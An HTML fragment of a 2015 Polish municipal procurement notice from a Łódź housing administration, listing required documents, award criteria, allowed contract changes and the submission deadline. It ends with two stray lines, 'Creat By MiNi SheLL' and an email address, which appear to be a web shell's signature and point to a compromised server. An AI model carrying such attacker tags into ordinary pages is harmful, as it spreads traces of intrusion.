<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz/e cenowy/e</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin składania opinii kominiarskich - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza-w granicach uregulowania art.144 ustawy Pzp, możliwość zmiany 
    umowy: 
a)  w przypadku wystąpienia okoliczności nie wynikających z winy Wykonawcy ani Zamawiającego, 
     których nie można było przewidzieć w chwili zawarcia umowy, a zrealizowanie założonego 
     pierwotnie celu umowy byłoby bez tych zmian niemożliwe;
b)  zmiany w zakresie sposobu wykonania zamówienia, jeżeli zmiany te są korzystne dla 
     Zamawiającego;
c)  w przypadku zmiany stawki podatku VAT dotyczącej przedmiotu zamówienia;
d)  w przypadku zmiany wielkości zasobów w trakcie realizacji umowy spowodowanej między 
     innymi: zmianą zarządcy nieruchomości, przejęciem nieruchomości przez właścicieli, zmianą 
     formy własności nieruchomości, przejęciem w zarząd nowych nieruchomości; 
e)  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są 
     konsekwencją winy którejkolwiek ze stron; 
f)  w przypadku reorganizacji, likwidacji Zamawiającego;
g)  zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych 
     sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami 
     umowy;
h)  zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności 
     prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, 
     skutkującą brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych 
     warunków zamówienia.
2. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest 
     poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorna.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Zasobów Komunalnych Łódź - Górna,93-129 Łódź,
ul. Lubelska 9/11, pokój 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2015 godzina 10:00, miejsce: Administracja Zasobów Komunalnych Łódź - Górna,93-129 Łódź,
ul. Lubelska 9/11, pokój 6 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com